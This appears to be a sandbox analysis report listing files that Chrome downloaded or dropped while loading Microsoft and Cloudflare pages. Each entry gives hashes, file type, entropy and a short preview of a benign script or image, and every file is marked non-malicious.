                                                                                                                                                                                                                                                          SSDEEP:192:2+ocdo4VYgB9G/0y/qhNJ5k4iflBDHndCjOGGWr:2+ocdo4B7G/0yyNSflhndCjOGGA
                                                                                                                                                                                                                                                          MD5:1DABD5CC3F7B68C178B59EA74DC62947
                                                                                                                                                                                                                                                          SHA1:B8DF9D8FD267B8B74325667DC97278CCC90A1464
                                                                                                                                                                                                                                                          SHA-256:E49EFB0A75AF4995902362EA679A0FC4EB120A881A090CB8424D5CBD183436A2
                                                                                                                                                                                                                                                          SHA-512:8C26E45CA37AC5DCCCC0C7BBCA92E0E8E11FB807A6D9A6916D5A0CC1CF198A7942DD5583C31ACBD1A11DDE004C252806D205E9CFDA7F494A6F7D5BBFA42920E4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/universalheader/v1/universalheader/clientlibs/site.min.ACSHASH1dabd5cc3f7b68c178b59ea74dc62947.js
                                                                                                                                                                                                                                                          Preview:'use strict';(()=>{function m(f){var e=G[f];if(void 0!==e)return e.exports;e=G[f]={exports:{}};return I[f](e,e.exports,m),e.exports}var I={1623:()=>{$(function(){function f(){-1!==document.cookie.indexOf("".concat("Cascade.AuthSSO","\x3d"))&&(document.cookie="".concat("Cascade.AuthSSO","\x3d; expires\x3dThu, 01 Jan 1970 00:00:00 UTC;"))}function e(){var a=function(){var d=document.cookie.match(/(^|;\s*)(Cascade.AuthSSO)=([^;]*)/);return d?(d=parseInt(decodeURIComponent(d[3])),!isNaN(d)&&d>n.DefaultAttempted?.n.SharedStateAttempted:n.DefaultAttempted):n.NotAttempted}(),c=!(!window.msauthRpsShare||b.accountConstraint===w.AAD);if(a===n.NotAttempted||c&&a!==n.SharedStateAttempted)!function(d){$("#".concat("cascadeauthsso")).remove();var g=document.createElement("iframe");g.src=d;g.setAttribute("width","0");g.setAttribute("height","0");g.setAttribute("border","0");g.setAttribute("frameborder","0");g.setAttribute("style","display: none");g.id="cascadeauthsso";document.body.appendChild(g)}(""
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (534)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):3288
                                                                                                                                                                                                                                                          Entropy (8bit):4.844125421768654
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:3jndjqDCc6oq7zCE/5j/mj/FlqplzC7l+tj+6j+7bq/jzCd9QtjQAjQQHUqCqzCt:3jdNGKmlklm7dYjmd20tqmMA
                                                                                                                                                                                                                                                          MD5:7677F65C1626AB1BDE509437776D4291
                                                                                                                                                                                                                                                          SHA1:E51C5E64E5ED9D95FFA2BB31B821229F4502BDA9
                                                                                                                                                                                                                                                          SHA-256:76607654EAFACC56092479AD570B118BE287CB2341711030CE47A88AAEC760D2
                                                                                                                                                                                                                                                          SHA-512:5A110A93A5B34B11D371140D59738C5659F2A54614F84C4E683D115E50852DEC3640A8CEE6F394D8584684E0C355C249F5636329B0AC03E73949DEC9423C2652
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-events.min.ACSHASH7677f65c1626ab1bde509437776d4291.js
                                                                                                                                                                                                                                                          Preview:'use strict';const oc={event:{cookiesPostConsent:{name:"oc.event.cookiesPostConsent",lastdispatched:void 0,dispatch:function(){oc.event.cookiesPostConsent.lastdispatched=Date.now();document.dispatchEvent(new Event(oc.event.cookiesPostConsent.name))},onChanged:function(a){"function"==typeof a&&("undefined"==typeof oc.event.cookiesPostConsent.lastdispatched?document.addEventListener(oc.event.cookiesPostConsent.name,()=>{a()}):a())}},marketSelector:{name:"oc.event.marketSelector",lastInit:void 0,dispatch:function(a,.b){oc.event.marketSelector.lastInit=Date.now();var c=document.createEvent("CustomEvent");c.initCustomEvent(oc.event.marketSelector.name,!0,!0,{eventName:a,value:b});document.dispatchEvent(c)},onInit:function(a){"function"==typeof a&&("undefined"==typeof oc.event.marketSelector.lastdispatched?document.addEventListener(oc.event.marketSelector.name,b=>{"oninit"===b.detail.eventName&&a()}):a())},onSelect:function(a){document.addEventListener(oc.event.marketSelector.name,b=>{"onsel
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:C++ source, ASCII text
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):3280
                                                                                                                                                                                                                                                          Entropy (8bit):4.696081700274861
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:mVZw3gPuCrA3sLT1m7RArtNmOuLT2LZ0dZyMLtZ/AmVT8TZi:mVZ4gPuCQqBQRArtMOEalxMLtZ47i
                                                                                                                                                                                                                                                          MD5:1C7E214F5AF8CAA06F783A38D40127C6
                                                                                                                                                                                                                                                          SHA1:61F88B722FAA7A7AE86D354DBCFC1D771FF23289
                                                                                                                                                                                                                                                          SHA-256:9EA42247944D18B77EB76FBCCAF1774559B6F312B1376002F553C4ECB827E4C5
                                                                                                                                                                                                                                                          SHA-512:559A3FA3364B742E5915E871333C043CF27F25110D3A624D0CDDC75DEE795F8633EB0C8A3186F2088B52516C1BC3A90F13545F9415278F3A4A52992AB7E8C96C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-onecloud-util.min.ACSHASH1c7e214f5af8caa06f783a38d40127c6.js
                                                                                                                                                                                                                                                          Preview:class OneCloudUtil {.. /**. * Get the API endpoint for the OneCloud Data Connector.. * @param {string} path - The path to append to the API endpoint.. * @param {string} querystring - The query string to add to the API endpoint.. * @returns {string} - The API endpoint with the environment specific query parameters.. */. static getMsocapiurl = (path, querystring) => {. let url = `${OneCloudEnvironmentConstants.DataConnector.endpoint}${path}`;. let envQueryParamKeys = Object.keys(OneCloudEnvironmentConstants.DataConnector.queryParams);.. // Add passed query string.. if(querystring && querystring.length > 0) {. url += `?${querystring}`;. } else if (envQueryParamKeys.length > 0) {. url += '?';. } .. // Add environment specific query parameters and return.. return OneCloudUtil.addEnvironmentSpecificQueryParams(url);;. }.. /**. * Add environment specific query parameters to the url.. * @param {string} url - The url to add the query paramete
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):306
                                                                                                                                                                                                                                                          Entropy (8bit):4.918725003124441
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:tnrwdhC/gKumc4slvIPXH0HXUXfWioNzQgTdf6t00Lt7UMLtNptSM:trwdU/gKuCPXH0HXUXfb1g5f6t0kRh
                                                                                                                                                                                                                                                          MD5:0ED6A4BBAC11D3B19565F7F4F11D7FBE
                                                                                                                                                                                                                                                          SHA1:26D0A4F103F89E841B57956240FF0BA142DEEA70
                                                                                                                                                                                                                                                          SHA-256:3827D704E1284CAD183FA3F78D37C1CE2DDD37A3D71450ACCD173A8AB369B77D
                                                                                                                                                                                                                                                          SHA-512:FB8680FFC0904EE89E1BE9C8E62A68825C52C649600CAB1C10105C4AA04ACA325780430800D179A687EA81635D509BBBA23D5796B619B209A23A5BE8132997A5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M21 6.43359V24H3V0H14.5664L21 6.43359ZM15 6H18.4336L15 2.56641V6ZM19.5 22.5V7.5H13.5V1.5H4.5V22.5H19.5ZM10.5 16.5H13.5V21H10.5V16.5ZM6 13.5H9V21H6V13.5ZM15 10.5H18V21H15V10.5Z" fill="#0078D4"/>.</svg>.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (47691)
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):47692
                                                                                                                                                                                                                                                          Entropy (8bit):5.4016459163756165
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                                                                                                                                                                                          MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                                                                                                                                                                                          SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                                                                                                                                                                                          SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                                                                                                                                                                                          SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.js
                                                                                                                                                                                                                                                          Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65471)
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1261555
                                                                                                                                                                                                                                                          Entropy (8bit):5.354757338113231
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12288:APiDJmqMZKDQvpRf8ELq/EB582r8MMLXADmmu/ZhKP:AqDJZf8Df8EqCWQDmmu/nKP
                                                                                                                                                                                                                                                          MD5:AC5F8D4D5E6678A9180933D55E25DC87
                                                                                                                                                                                                                                                          SHA1:684C58D6FBD3E7172699D2E82105AE0AD611EB27
                                                                                                                                                                                                                                                          SHA-256:DF3B93C843EB04A7F7B940712183B1A89A6A4B99CCA1FB86B4C57C992C6CC5AF
                                                                                                                                                                                                                                                          SHA-512:FDC8FA54F7121CAC0CEC5E86A76ACC6EB00DC74B54271EEEB98C094D2538277CD78448AE823D2780C8968830500844311076A23470DCB69FB209D40239EBC8E4
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:/*! For license information please see webchat.js.LICENSE.txt */.!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var r=t();for(var n in r)("object"==typeof exports?exports:e)[n]=r[n]}}(self,(function(){return function(){var e,t,r={37825:function(e,t,r){"use strict";var n=r(92412),i={childContextTypes:!0,contextType:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultProps:!0,getDerivedStateFromError:!0,getDerivedStateFromProps:!0,mixins:!0,propTypes:!0,type:!0},o={name:!0,length:!0,prototype:!0,caller:!0,callee:!0,arguments:!0,arity:!0},a={$$typeof:!0,compare:!0,defaultProps:!0,displayName:!0,propTypes:!0,type:!0},s={};function c(e){return n.isMemo(e)?a:s[e.$$typeof]||i}s[n.ForwardRef]={$$typeof:!0,render:!0,defaultProps:!0,displayName:!0,propTypes:!0},s[n.Memo]=a;var u=Object.defineProperty,l=Object.getOwnPropertyNames,p=Object.getOwnPropertySymbols,d=Object.getOwnPropertyDes
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):681
                                                                                                                                                                                                                                                          Entropy (8bit):5.043291133932798
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:tr1tB3ut9BKXWsFYZjzFWZ8ed8Rfc3EnDiHAxcmjnDiHAxc1tnDiHA/KLtkiHAie:tTB3ut90XOsZ58Rf2ADHxvDHxkDH/Ek7
                                                                                                                                                                                                                                                          MD5:104138E7B8F89DBF7CC66485544A0669
                                                                                                                                                                                                                                                          SHA1:7C3F43BDA4BAF55F893876DC62B55800E194F135
                                                                                                                                                                                                                                                          SHA-256:FCA9EEC67C99F083AF9AA30169AF20B7DE12949D45A48FACC70B061F1F0FCBE0
                                                                                                                                                                                                                                                          SHA-512:7BE127AE63F31606BFC909476F8ACF4857726E6C5A7CCCE06FF6EB713CFA328DB58B2FBDBBB298D59030CED8853AEE4771D865DCAA487871E6F71E79CE687F98
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:<svg width="43" height="32" viewBox="0 0 43 32" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_14400_15452)">.<path d="M0 14.9335C0 6.68606 6.65493 0.000183105 14.8642 0.000183105H28.1358C36.3451 0.000183105 43 6.68607 43 14.9335V17.0669C43 25.3143 36.3451 32.0002 28.1358 32.0002H0V14.9335Z" fill="#004275"/>.<ellipse cx="12.6195" cy="16.4706" rx="2.33696" ry="2.35294" fill="white"/>.<ellipse cx="21.0326" cy="16.4706" rx="2.33696" ry="2.35294" fill="white"/>.<ellipse cx="29.4457" cy="16.4706" rx="2.33696" ry="2.35294" fill="white"/>.</g>.<defs>.<clipPath id="clip0_14400_15452">.<rect width="43" height="32" fill="white"/>.</clipPath>.</defs>.</svg>.
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):2235
                                                                                                                                                                                                                                                          Entropy (8bit):4.235908927621097
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:/PuSVWTPvaDTFRE1byCd88PuIMJZ1G+z1/wi8Iy6W35yPlmOV3XkT:e/7i41hP4JSpig6W3IPlmOuT
                                                                                                                                                                                                                                                          MD5:1D6526DEA1E377470F4EDB86A75D6273
                                                                                                                                                                                                                                                          SHA1:DE8EE2F5C4C7BB79851BCE11FEC4CFD13A6D3F74
                                                                                                                                                                                                                                                          SHA-256:01B6F7E2663BAAD2460C51316B6C0132DC88FEC6E91AA7B22F08AD4BECC3DFAB
                                                                                                                                                                                                                                                          SHA-512:58461D566C1EC9DF0018175FEE437EA4941F9E091A242F635BAC9EFA75330CF8119B7918E9D2F96A0C281743100F754E014C6B683D58B07958D3D046D2A6EE9F
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:<svg width="22" height="22" viewBox="0 0 22 22" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_2826_4519)">.<path d="M19.25 11H22V13.0518C22 13.46 21.932 13.8503 21.7959 14.2227C21.6598 14.5951 21.4665 14.9352 21.2158 15.2432C20.9652 15.5511 20.6715 15.8053 20.335 16.0059C19.9984 16.2064 19.6224 16.346 19.207 16.4248L19.2178 16.1562C19.1748 16.5286 19.0781 16.8796 18.9277 17.209C18.7773 17.5384 18.584 17.8392 18.3477 18.1113C18.1113 18.3835 17.8356 18.6126 17.5205 18.7988C17.2054 18.985 16.8652 19.1139 16.5 19.1855V20.625H19.25V22H12.375V20.625H15.125V19.1855C14.7598 19.1139 14.4196 18.985 14.1045 18.7988C13.7894 18.6126 13.5137 18.387 13.2773 18.1221C13.041 17.8571 12.8477 17.5563 12.6973 17.2197C12.5469 16.8831 12.4502 16.5286 12.4072 16.1562L12.418 16.4248C12.0098 16.3389 11.6374 16.1921 11.3008 15.9844C10.9642 15.7767 10.6706 15.526 10.4199 15.2324C10.1693 14.9388 9.97591 14.6094 9.83984 14.2441C9.70378 13.8789 9.63216 13.4814 9.625 13.0518V11H12.375V9.625
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:PNG image data, 1720 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):13016
                                                                                                                                                                                                                                                          Entropy (8bit):7.883155506636877
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:1usWVOBxMoGH4u9YRcVnk3rPnmE+59UOy+tYwOjPMZdC8NhfQyQYLWrBvo04uE:GKx3GH/9Y0cmAOXtYwOadVhfyYLyP4uE
                                                                                                                                                                                                                                                          MD5:F5B4B4F04F1924F9470DC3C0B3E4FC01
                                                                                                                                                                                                                                                          SHA1:28D187B90F70638832771600CD556BC85B418A37
                                                                                                                                                                                                                                                          SHA-256:98FB37F9F0DA54BB17E1322E1A49D5D683854A0BD3DE47C01EB3F0CCBB8B2999
                                                                                                                                                                                                                                                          SHA-512:676E6866C149E56699CA65887D4DB5903CD6F84D32987215F218082E4E441340931221BDED2A78512DEDF417848379DD7E45BF4F87804BC7FEFF7CB3632CB53B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......P.....B.uk....pHYs...........~... .IDATx.....\.u..+{)....b...G9d....hL#....."p-[K.J.6G.;..i4..q.8.0q.vk...QVk#...3.lq...a+....J.....b..vQ....b..)...s..7....w.}.... w~.}3.....k.^.h.....X.z}.a.9<...............-o......c.-..s.Ti.......^x...g_.i...=........\R?0S....sg.....G....o.J.m...].b....u...w.Z...[...}.l...1.~..B...7.\HT?0S...n....y"......z}.^`.4.T....Y......?7w.;..A...X...s..Um..~`..V..G.J,$.5...Mg..#.|...S...O.?..u..7]{....nxK.....?2.<.....N..i...?....=.......q....>..c[..f...#.jG..F.!6.......G.}O.~.*.$..w..+..,....M.>.}....6T$1g?.Z......1.l_5....6.-......-.W.$..B"9!V.q.JCd....G.I.C8...... 4....K....mH....d.&..IT..<.~...,Hp.%.v.@.~.7k......Z.Y......p.^#.....l.35..5I`j'%..1..x.........={.*o....bye..;v..1./~.w[..{@.N...J.mG..z...[w.=x....K....C..\......;....{o....Y..?...K;c..~...u.)m.M...m-.g.}O.MU.7.~._.eK~..UI 6Ht..l6.........F2v....q.zV..TZ..w}v.....h.t...T%..>5.7.$.{A...lsY..2.K..f.b.>....)...K...RL
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1340
                                                                                                                                                                                                                                                          Entropy (8bit):5.340331154152696
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:tOEPutvyBLfJ6KDjDq+qes12ygdBLG8cD168Q2BLN2HxNNcGdGH2kQHxNNcG9GIa:9kkLvD/3DyYLck8QoLIHtEH23HtkIyHX
                                                                                                                                                                                                                                                          MD5:5984947DF59FE0699EADBAFB42861404
                                                                                                                                                                                                                                                          SHA1:9AEAF7DBC1C6774D7F5FD19EBB001C824C03E7B3
                                                                                                                                                                                                                                                          SHA-256:0B3C5E550FD754CFBD4BDCA1185A108309C1FD3B7ABEED8A012BD38F27C71A25
                                                                                                                                                                                                                                                          SHA-512:3290C21145AF2306920E4590FDCEB98F86CE47472AA6070FAB4438B7FFD99B1D545E2403946A3130CDC253B0C96A065C794A8063E5A59B4C0E34C5D6A3F25631
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:<svg width="116" height="183" viewBox="0 0 116 183" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M115.525 0V175.78H64.9211V0H115.525Z" fill="url(#paint0_linear_2793_6730)"/>.<path opacity="0.25" d="M83.3227 54.0154V178.526H32.719V46.6914H77.1891C80.5768 46.6914 83.3227 49.9708 83.3227 54.0154Z" fill="black" stroke="black" stroke-opacity="0.5" stroke-width="7.33797"/>.<path d="M83.3227 51.2689V175.78H32.719V43.9449H77.1891C80.5768 43.9449 83.3227 47.2243 83.3227 51.2689Z" fill="url(#paint1_linear_2793_6730)"/>.<path d="M0.516846 87.89V175.78H51.1206V95.214C51.1206 91.1694 48.3742 87.89 44.9865 87.89H0.516846Z" fill="url(#paint2_linear_2793_6730)"/>.<defs>.<linearGradient id="paint0_linear_2793_6730" x1="56.4873" y1="1.08736e-06" x2="140.728" y2="154.216" gradientUnits="userSpaceOnUse">.<stop stop-color="#E6AD10"/>.<stop offset="1" stop-color="#C87E0E"/>.</linearGradient>.<linearGradient id="paint1_linear_2793_6730" x1="32.7149" y1="43.9449" x2="102.931" y2="161.553" gradient
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1600x724, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):9846
                                                                                                                                                                                                                                                          Entropy (8bit):7.947599117819747
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:tsbTyuAmChwCRzGTPBj+k7zXClCNsMSTBr0qvoxyMWQMJ9nGw:MWwCErBSwCEfStr7OybQZw
                                                                                                                                                                                                                                                          MD5:6A12DE98860437C777D82BBC867BEF9E
                                                                                                                                                                                                                                                          SHA1:05EFB81F5B376B84740B7EEC8F62CE923BAD6D0C
                                                                                                                                                                                                                                                          SHA-256:761F8DBB35A3DA2D008D744293BA1ADAF00FF115D72BCAE6E335F9C60FFBAC2E
                                                                                                                                                                                                                                                          SHA-512:16C8E759E36B29C7AC94BF0F689B145935B886725A54611D53C961D23911D80DF8CFE2BE6D4F49C57F3DAC2F79CDCF3701A5B0F1C5F00C174B6FD77994193B5B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:RIFFn&..WEBPVP8 b&......*@...>...B!.....a--..5..W~...:.......u;..m.?...s......... ..?..^|...]..........=...{...'!.NC.l....9.}.r..d.=...{...'!.NC.l....9.}.r..d.=...{...'!.NC.l....9.}.r..d.=...{...'!.NC.k.o{...'!.NC.l....9.}.r..d.=...{...'!....(.dR.k...{...'!.NC.l....9.}.r..d.=...{...&$Pg....'!.NC.l....9.}.r..d.=...{...'!......Y..].@.]..%C...{...'!.NC.l....9....N.L|...t.....u.`.:.Ol....6...Y.. .J.d.^.NC.l....9.}.r..d.=..(......G.....))iP,.j..F.01..XuXF...9.}.r..d.=...{...{d.8..=...{...QY...> xxq.b..s.<C?!....yrr..d.=...{...'!..&Vj{d.=...{.V../V .J]..".;.14./Bq........T.%..rr..d.=...{...5.YV..{...'!._3..N..j.}....C.......l....9.}.r..d.|...o.NC.l...Q.'";.?..M.....w.. .4..+../.....,......{...'!.N?.{.]....._K......(.............q....g.5D.2r@;|4.o.....x.9.}.r..d.|...m..).]..l.iP,.)IKJ/.uc....O...B(.3..A)3j$.@-7!.NC.l....9.Z..N....\.....'!.8.yD.|..T.B#...gQ$!(b..:...`.....Y.........89s/...}..NC.l.......Q|.h%#....k..".J.p._.J."@.8
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                          Size (bytes):126701
                                                                                                                                                                                                                                                          Entropy (8bit):7.998099194477281
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:3072:1KjKdTu6A170uaTVeZFud+wFGxeZXeDLGM0:1KAA17WsHud+SHZSLG7
                                                                                                                                                                                                                                                          MD5:118EBDCB80DACDFA81C087A629437D90
                                                                                                                                                                                                                                                          SHA1:494DE78A23AD3A0C73B3029159209699F30E4274
                                                                                                                                                                                                                                                          SHA-256:6827D4A19961773F70CFBFB46B047CCF5945A9CBB7368F0D7014FC071DD32EEB
                                                                                                                                                                                                                                                          SHA-512:72B3E70ABA828C37C41C647CDE6CCDB55938A98198EECECBCEFCCE9A7D66FDEDB782E3793A8EB17533B3971D4C38B9FFC2033CF8DC1969500D4109449CE3170C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/hero%20bg-1600X582?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1600&hei=582&qlt=95&fmt=png-alpha&fit=constrain"
                                                                                                                                                                                                                                                          Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe.......@...F....pixi............av1C........colrnclx...........ipma...................mdat.....jq.......2...D.........4.W=*.[jJ3".V3y.A........\.dI.#..w=.v....mZ...9.WY...e.9..+R..m...=q.Z..sE....d ?.+.;7........;.5._..o.........I..O...`.}.$|..].mp"..Z.]3.\{.......S:....E..%M......k...#..d.;a..y%#........#Oi..=Q..`.D..L..r....@..G.b..=...).V...........`.u".M.2.Og..1..lgM1H.0..j...G..@...J/.y*8m..'.U....9..y..q...'h.GV........8.p../....t.....2bx..@%8`........{..-.s^...Ds.t0nB.r.....TS......rE+A.8.O..Rk..K.....O..g...O..D~.}..ku.......K...m<#....}..,;@/RP.d$.t....+K&....._.<......v...2.I.x.S.u.>b...B..xs..T.y[.....u...........LDJd.E[..(....x.......Ux....{+=F2...:..v....j(.nn...'.B....._..~Q.jQ...E...?....#8.....'Q...y..X\..N.&BFRD.-I.C...u.l.tc.B.....)j...:c5C
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):9539
                                                                                                                                                                                                                                                          Entropy (8bit):4.727148213062689
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:3lGqnBqPmIa4HAb1WWe13GgkNb2c6cN0JL2xl9zbIPcJtQIgGySjye1nGEZ8UhWW:3l/gPmIaP3U2gkNCcUJL2xlq0Jt6G351
                                                                                                                                                                                                                                                          MD5:9EEA5F80FED74A300CCBBAA4DC41DF2A
                                                                                                                                                                                                                                                          SHA1:08568A33ED8E994237DB997AFABF85723AD7E92D
                                                                                                                                                                                                                                                          SHA-256:32E9B0F50257F381F3F1F3002B7DFD3AF138916429D53FAAC58FD9D0D1550CF4
                                                                                                                                                                                                                                                          SHA-512:0114AC63E722B5628605986B2F2A483F2822CE043F988638DE3DEE202BA96D91B5AE723D585558540A123C9978BEC169C90FF98E567ED74053D57EDE7F1340DB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Preview:/**.* This function is to add source parameter through JS in the hyperlink..*/.$(document).ready(function () {. const appendReferrerLinks = document.querySelectorAll('[data-isautoappendreferrer="true"]');. if (appendReferrerLinks.length) {. const lang = "/" + document.documentElement.lang?.toLowerCase();. let currentUrl = window.location.href.toLowerCase().replace(window.location.search, "").replace(lang, "");. if (currentUrl.endsWith("/")) {. .currentUrl = currentUrl.slice(0, -1);. }. const sourceLink = "srcurl=" + encodeURIComponent(currentUrl);. appendReferrerLinks.forEach(link => {. if (!link.href.includes("srcurl=")) {. const separator = link.href.includes("?") ? "&" : "?";. link.href = link.href + separator + sourceLink;. }. });. }.});./**. * Query Parameter Passthrough Utility. *. * This utility updates anchor tags in a web page by modifying the. * 'href' attribut
                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1583
                                                                                                                                                                                                                                                          Entropy (8bit):4.041589377749132
                                                                                                                                                                                                                                                          Encrypted:false
